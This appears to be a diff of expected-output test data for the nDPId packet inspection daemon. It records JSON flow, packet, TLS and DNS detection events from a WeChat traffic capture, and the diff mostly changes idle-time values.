-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167639887,"flow_last_seen":1492167639887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167639887,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1492167639887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167639887,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8T5xAAEAGxaDAqAFny82XotNhAbttdZ2FAAAAAKACchD+DQAAAgQFtAQCCAoAMdIZAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167640138,"flow_last_seen":1492167640138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167640138,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1492167640138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640138,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8VUZAAEAGv\/bAqAFny82XotNiAbsbK4ceAAAAAKACchBmfwAAAgQFtAQCCAoAMdJYAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1492167640203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640203,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Ea0aYHbXWdhqASN8gHqwAAAgQFoAQCCApF8injADHSGQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1492167640203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640203,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0T51AAEAGxafAqAFny82XotNhAbttdZ2GGtGmCIAQAOVs9wAAAQEICgAx0mhF8inj"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":891,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167639887,"flow_last_seen":1492167640203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167640203,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1492167640450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640450,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702LyUvm4GyuHH6ASN8hErAAAAgQFoAQCCApF8iogADHSWAEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1492167640450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640450,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0VUdAAEAGv\/3AqAFny82XotNiAbsbK4cf8lL5uYAQAOWp+QAAAQEICgAx0qZF8iog"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":898,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167639887,"flow_last_seen":1492167640523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167640523,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1492167648243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1492167648243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7101AAEAR3q7AqAFnwKgB\/kphADUAJzTVMN0BAAABAAAAAAAAA3JlcwJ3eAJxcQNjb20AAAEAAQ=="} 00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1492167648277,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"thread_ts_msec":1492167648277,"pkt":"eJKcD6iO8IQvSpdgCABFoAILAABAAEARs4zAqAH+wKgBZwA1SmEB91rcMN2BgAABAA0AAgAMA3JlcwJ3eAJxcQNjb20AAAEAAcAMAAUAAQAADgoACwVyZXN3eAJ0Y8ATwCsABQABAAAALgANBXJlc3d4BHRjZG7AE8BCAAUAAQAAAC8ABgNzc2TAMcBbAAUAAQAAAhgABgNzc2TASMBtAAEAAQAAAIwABMvNniLAbQABAAEAAACMAATLzZfUwG0AAQABAAAAjAAEy82eNcBtAAEAAQAAAIwABMvNnjfAbQABAAEAAACMAATLzZfjwG0AAQABAAAAjAAEy82eI8BtAAEAAQAAAIwABMvNnjjAbQABAAEAAACMAATLzZfTwG0AAQABAAAAjAAEy82eNsBIAAIAAQAANa8ACgducy1jZG4xwBPASAACAAEAADWvAAoHbnMtY2RuMsATwQ8AAQABAAACoQAEtv4QccEPAAEAAQAAAqEABLhpznrBDwABAAEAAAKhAAQOEROMwQ8AAQABAAACoQAEZwce7sEPAAEAAQAAAqEABHt+dlDBDwABAAEAAAKhAAS0oxYuwSUAAQABAAACoQAEtv4LcsElAAEAAQAAAqEABLb+bmTBJQABAAEAAAKhAATLzZfxwSUAAQABAAACoQAEDhEsW8ElAAEAAQAAAqEABHBaSWTBJQABAAEAAAKhAAR9Jy3o"} 00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":1,"num_answers":27,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.158.34"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648277,"flow_last_seen":1492167648277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1492167648277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648277,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8euFAAEAGk9vAqAFny82eIqtKAbscYaCqAAAAAKACchBlYgAAAgQFtAQCCAoAMdpLAAAAAAEDAwc="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648494,"flow_last_seen":1492167648494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1492167648494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648494,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/\/9AAEAGDr3AqAFny82eIqtLAbsShiV+AAAAAKACchDqMgAAAgQFtAQCCAoAMdqBAAAAAAEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1492167648582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648582,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0qHWOtEHGGgq4ASOQgtSgAAAgQFtAEBBAIBAwMH"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1492167648582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648582,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoeuJAAEAGk+7AqAFny82eIqtKAbscYaCrh1jrRVAQAOWmPwAA"} -00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1492167648873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648873,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0tO\/rLJEoYlf4ASOQgjJgAAAgQFtAEBBAIBAwMH"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1492167648873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648873,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoAABAAEAGDtHAqAFny82eIqtLAbsShiV\/Tv6yylAQAOWcGwAA"} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}} -01570{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"thread_ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648277,"flow_last_seen":1492167648277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1492167648277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648277,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8euFAAEAGk9vAqAFny82eIqtKAbscYaCqAAAAAKACchBlYgAAAgQFtAQCCAoAMdpLAAAAAAEDAwc="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648494,"flow_last_seen":1492167648494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167648494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1492167648494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167648494,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/\/9AAEAGDr3AqAFny82eIqtLAbsShiV+AAAAAKACchDqMgAAAgQFtAQCCAoAMdqBAAAAAAEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1492167648582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648582,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0qHWOtEHGGgq4ASOQgtSgAAAgQFtAEBBAIBAwMH"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1492167648582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648582,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoeuJAAEAGk+7AqAFny82eIqtKAbscYaCrh1jrRVAQAOWmPwAA"} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1492167648873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167648873,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0tO\/rLJEoYlf4ASOQgjJgAAAgQFtAEBBAIBAwMH"} 